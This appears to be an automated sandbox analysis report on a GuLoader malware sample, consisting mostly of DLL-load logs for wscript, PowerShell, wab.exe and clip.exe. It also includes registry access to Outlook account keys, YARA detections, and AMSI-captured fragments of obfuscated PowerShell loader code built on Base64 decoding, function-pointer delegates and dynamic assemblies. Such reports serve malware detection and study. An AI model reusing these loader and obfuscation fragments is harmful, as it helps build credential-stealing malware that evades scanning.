Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\clip.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: actxprxy.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptdlg.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msoert2.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msimg32.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptui.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msftedit.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: explorerframe.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("PowerShell "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$E", "Unsupported parameter type 00000000")
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2491020170.000000000A67A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2900609762.000000000902B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2872130350.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3250010228.0000000005A14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Dreegh $Kloakeringsarbejder $Oprrsomraadet), (Sprhjulene47 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afslidt = [AppDomain]::CurrentDomain.GetAssembli
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flimsier)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forsat, $false).DefineType($Symplesite, $Anfgtel
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Hovedstrukturernes)$global:Lvhytterne = [System.Text.Encoding]::ASCII.GetString($Abjudicate)$global:Skikkelsens=$Lvhytterne.substring(314784,26302)<#Vigtigpraasen Manipulationssproge
